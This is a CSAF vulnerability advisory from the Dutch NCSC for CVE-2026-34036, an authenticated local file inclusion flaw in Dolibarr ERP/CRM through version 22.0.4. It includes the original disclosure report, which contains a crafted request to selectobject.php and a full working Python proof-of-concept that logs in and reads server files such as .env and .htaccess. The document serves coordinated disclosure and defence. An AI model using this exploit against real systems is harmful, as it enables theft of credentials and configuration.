{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-34036", "tracking": { "current_release_date": "2026-04-03T17:26:25.017679Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-34036", "initial_release_date": "2026-03-27T20:28:35.123923Z", "revision_history": [ { "date": "2026-03-27T20:28:35.123923Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-27T20:28:40.025875Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-31T02:38:54.020336Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-31T02:38:56.658556Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-31T03:24:58.267578Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-31T03:24:59.852872Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-31T07:35:23.827158Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-03-31T14:39:08.560092Z", "number": "8", "summary": "Unknown change." }, { "date": "2026-03-31T14:39:12.081194Z", "number": "9", "summary": "NCSC Score updated." }, { "date": "2026-03-31T16:55:45.291232Z", "number": "10", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-31T16:55:47.146158Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-31T19:55:16.626950Z", "number": "12", "summary": "References created (1)." }, { "date": "2026-04-01T03:30:15.026769Z", "number": "13", "summary": "NCSC Score updated." }, { "date": "2026-04-03T17:25:42.058778Z", "number": "14", "summary": "Products created (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-04-03T17:25:50.354816Z", "number": "15", "summary": "NCSC Score updated." } ], "status": "interim", "version": "15" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<=22.0.4", "product": { "name": "vers:unknown/<=22.0.4", "product_id": "CSAFPID-5966423" } } ], "category": "product_name", "name": "dolibarr" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<=22.0.4", "product": { "name": "vers:unknown/<=22.0.4", "product_id": "CSAFPID-5992579", "product_identification_helper": { "cpe": "cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "dolibarr_erp\\/crm" } ], "category": "vendor", "name": "Dolibarr" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-34036", "cwe": { "id": "CWE-98", "name": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')" }, "notes": [ { "category": "description", "text": "# Authenticated Local File Inclusion (LFI) via selectobject.php leading to sensitive data disclosure\n\n## Target\n\nDolibarr Core (Tested on version 22.0.4)\n\n## Summary\n\nA Local File Inclusion (LFI) vulnerability has been discovered in the core AJAX endpoint `/core/ajax/selectobject.php`. By manipulating the `objectdesc` parameter and exploiting a fail-open logic flaw in the core access control function `restrictedArea()`, an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as `.env`, `.htaccess`, configuration backups, or logs…).\n\n## Vulnerability Details\n\nThe vulnerability is caused by a critical design flaw in `/core/ajax/selectobject.php` where dynamic file inclusion occurs **before** any access control checks are performed, combined with a fail-open logic in the core ACL function.\n\n- **Arbitrary File Inclusion BEFORE Authorization:** The endpoint parses the `objectdesc` parameter into a `$classpath`. If `fetchObjectByElement` fails (e.g., by providing a fake class like `A:conf/.htaccess:0`), the application falls back to `dol_include_once($classpath)` at **line 71**. At this point, the arbitrary file is included and its content is dumped into the HTTP response buffer. This happens *before* the application checks any user permissions.\n- **Access Control Bypass (Fail-Open):** At **line 102**, the application finally attempts to verify permissions by calling `restrictedArea()`. Because the object creation failed, the `$features` parameter sent to `restrictedArea()` is empty (`''`). Inside `security.lib.php`, if the `$features` parameter is empty, the access check block is completely skipped, leaving the `$readok` variable at `1`. Because of this secondary flaw, the script finishes cleanly with an HTTP 200 OK instead of throwing a 403 error.\n\nThis allows any authenticated user to bypass ACLs and include files. While PHP files cause a fatal error before their code is displayed, the contents of any text-based file (like `.htaccess`, `.env`, `.json`, `.sql`) are dumped into the HTTP response before the application crashes.\n\n## Steps to Reproduce\n\n- Log in to the Dolibarr instance with any user account (no specific permissions required).\n- Intercept or manually forge a GET request to the following endpoint:\n\n```\nGET /core/ajax/selectobject.php?outjson=0&htmlname=x&objectdesc=A:conf/.htaccess:0\n```\n\n- Observe the HTTP response. The contents of the `conf/.htaccess` file will be reflected in the response body right before the PHP Fatal Error message.\n- *(Optional)* Run the attached Python PoC to automate the extraction:\n\n```\npython3 poc.py --url http://target.com --username '' --password '' --file conf/.htaccess\n```\n\n## Impact\n\nAn attacker with minimal access to the CRM can exfiltrate sensitive files from the server. This can lead to the disclosure of environment variables (`.env`), infrastructure configurations (`.htaccess`), installed packages versions, or even forgotten logs and database dumps, paving the way for further attacks.\n\n## Suggested Mitigation\n\n- **Input Validation & Whitelisting:** The `$classpath` must be strictly validated or whitelisted before being passed to `dol_include_once()`.\n- **Execution Flow Correction:** The file inclusion logic must never be executed before the user's authorization has been fully verified.\n- **Enforce Fail-Secure ACLs:** Modify `restrictedArea()` in `core/lib/security.lib.php` so that if the `$features` parameter is empty, access is explicitly denied (`$readok = 0`) instead of allowed by default.\n\n## Disclosure Policy & Assistance\n\nThe reporter is committed to coordinated vulnerability disclosure. This vulnerability, along with the provided PoC, will be kept strictly confidential until a patch is released and explicit authorization for public disclosure is given.\n\nShould any further technical details, logs, or testing of the remediation once a patch has been developed be needed, the reporter is available to assist.\n\nThank you for the time and commitment to securing Dolibarr.\n\nBest Regards,\nVincent KHAYAT (cnf409)\n\n## Video PoC\n\nhttps://github.com/user-attachments/assets/4af80050-4329-4c88-8a54-e2b522deb844\n\n## PoC Script\n\n```python\n#!/usr/bin/env python3\n\"\"\"Dolibarr selectobject.php authenticated LFI PoC\"\"\"\n\nimport argparse\nimport html\nimport re\nimport urllib.error\nimport urllib.parse\nimport urllib.request\nfrom http.cookiejar import CookieJar\n\nLOGIN_MARKERS = (\"Login @\", \"Identifiant @\")\nLOGOUT_MARKERS = (\"/user/logout.php\", \"Logout\", \"Mon tableau de bord\")\n\ndef request(\n opener, base_url, method, path, params=None, data=None, timeout=15\n):\n url = f\"{base_url.rstrip('/')}{path}\"\n if params:\n url = f\"{url}?{urllib.parse.urlencode(params)}\"\n payload = urllib.parse.urlencode(data).encode(\"utf-8\") if data else None\n req = urllib.request.Request(url, method=method.upper(), data=payload)\n req.add_header(\"User-Agent\", \"dolibarr-lfi-poc/1.0-securitytest-for-dolibarr\")\n req.add_header(\"Accept\", \"text/html,application/xhtml+xml\")\n try:\n with opener.open(req, timeout=timeout) as resp:\n return resp.status, resp.read().decode(\"utf-8\", errors=\"replace\")\n except urllib.error.HTTPError as err:\n return err.code, err.read().decode(\"utf-8\", errors=\"replace\")\n\ndef extract_login_token(page):\n for pattern in (\n r'name=[\"\\']token[\"\\']\\s+value=[\"\\']([^\"\\']*)[\"\\']',\n r'name=[\"\\']anti-csrf-newtoken[\"\\']\\s+content=[\"\\']([^\"\\']*)[\"\\']',\n ):\n match = re.search(pattern, page, flags=re.IGNORECASE)\n if match:\n return match.group(1)\n return \"\"\n\ndef looks_authenticated(body):\n return any(marker in body for marker in LOGOUT_MARKERS)\n\ndef clean_included_output(body):\n for marker in (\n \"
\\nWarning\",\n \"
\\r\\nWarning\",\n \"
\\nFatal error\",\n \"
\\r\\nFatal error\",\n ):\n pos = body.find(marker)\n if pos != -1:\n return body[:pos].rstrip()\n return body.rstrip()\n\ndef login(opener, base_url, username, password):\n code, login_page = request(opener, base_url, \"GET\", \"/\")\n if code >= 400:\n return False, f\"HTTP {code} on login page\"\n token = extract_login_token(login_page)\n code, after_login = request(\n opener,\n base_url,\n \"POST\",\n \"/index.php?mainmenu=home\",\n data={\n \"token\": token,\n \"actionlogin\": \"login\",\n \"loginfunction\": \"loginfunction\",\n \"username\": username,\n \"password\": password,\n },\n )\n if code >= 400:\n return False, f\"HTTP {code} on login request\"\n if looks_authenticated(after_login):\n return True, \"\"\n code, home = request(opener, base_url, \"GET\", \"/index.php?mainmenu=home\")\n if code < 400 and looks_authenticated(home):\n return True, \"\"\n return False, \"Invalid username or password\"\n\ndef read_file(opener, base_url, relative_path):\n status, body = request(\n opener,\n base_url,\n \"GET\",\n \"/core/ajax/selectobject.php\",\n params={\n \"outjson\": \"0\",\n \"htmlname\": \"x\",\n \"objectdesc\": f\"A:{relative_path}:0\",\n },\n )\n if any(marker in body for marker in LOGIN_MARKERS) and not looks_authenticated(body):\n raise RuntimeError(\"Session expired or not authenticated\")\n return status, body, clean_included_output(body)\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"Authenticated LFI PoC against /core/ajax/selectobject.php (Dolibarr 22.0.4).\"\n )\n parser.add_argument(\n \"--url\",\n default=\"http://127.0.0.1:8080\",\n help=\"Dolibarr base URL (default: http://127.0.0.1:8080)\",\n )\n parser.add_argument(\"--username\", required=True, help=\"Dolibarr username\")\n parser.add_argument(\"--password\", required=True, help=\"Dolibarr password\")\n parser.add_argument(\n \"--file\",\n dest=\"target_file\",\n required=True,\n help=\"Target file to read (e.g. conf/.htaccess).\",\n )\n return parser.parse_args()\n\ndef print_result(path, status, raw, clean):\n print(f\"\\n[+] HTTP status: {status}\")\n print(f\"[+] Requested file: {path}\")\n print(\"=\" * 80)\n if clean:\n print(html.unescape(clean))\n else:\n print(\"(No readable output extracted)\")\n print(\"=\" * 80)\n if clean != raw.rstrip():\n print(\"[i] PHP warnings/fatal output were trimmed from display.\")\n\ndef summarize_error_body(body, limit=1200):\n text = html.unescape(body).strip()\n if not text:\n return \"(Empty response body)\"\n if len(text) > limit:\n return text[:limit].rstrip() + \"\\n... [truncated]\"\n return text\n\ndef main():\n args = parse_args()\n opener = urllib.request.build_opener(\n urllib.request.HTTPCookieProcessor(CookieJar())\n )\n ok, reason = login(opener, args.url, args.username, args.password)\n if not ok:\n print(f\"[!] {reason}\")\n return 1\n print(\"[+] Login successful.\")\n try:\n status, raw, clean = read_file(opener, args.url, args.target_file)\n if status >= 400:\n print(f\"[!] HTTP {status} while reading target file.\")\n print(\"=\" * 80)\n print(summarize_error_body(raw))\n print(\"=\" * 80)\n return 1\n print_result(args.target_file, status, raw, clean)\n return 0\n except Exception as exc:\n print(f\"[!] Error: {exc}\")\n return 1\n\nif __name__ == \"__main__\":\n try:\n raise SystemExit(main())\n except KeyboardInterrupt:\n print(\"\\nInterrupted.\")\n raise SystemExit(130)\n```", "title": "github - https://api.github.com/advisories/GHSA-2mfj-r695-5h9r" }, { "category": "description", "text": "Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions 22.0.4 and prior, there is a Local File Inclusion (LFI) vulnerability in the core AJAX endpoint /core/ajax/selectobject.php. By manipulating the objectdesc parameter and exploiting a fail-open logic flaw in the core access control function restrictedArea(), an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as .env, .htaccess, configuration backups, or logs…). At time of publication, there are no publicly available patches.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/34xxx/CVE-2026-34036.json" }, { "category": "description", "text": "Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions 22.0.4 and prior, there is a Local File Inclusion (LFI) vulnerability in the core AJAX endpoint /core/ajax/selectobject.php. By manipulating the objectdesc parameter and exploiting a fail-open logic flaw in the core access control function restrictedArea(), an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as .env, .htaccess, configuration backups, or logs…). At time of publication, there are no publicly available patches.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-34036" }, { "category": "other", "text": "0.00026", "title": "EPSS" }, { "category": "other", "text": "4.0", "title": "NCSC Score" }, { "category": "other", "text": "There is exploit data available from source Nvd, Is related to (a version of) an uncommon product", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5966423", "CSAFPID-5992579" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-2mfj-r695-5h9r" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/34xxx/CVE-2026-34036.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-34036" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-2mfj-r695-5h9r" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34036" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM" }, "products": [ "CSAFPID-5966423", "CSAFPID-5992579" ] } ], "title": "CVE-2026-34036" } ] }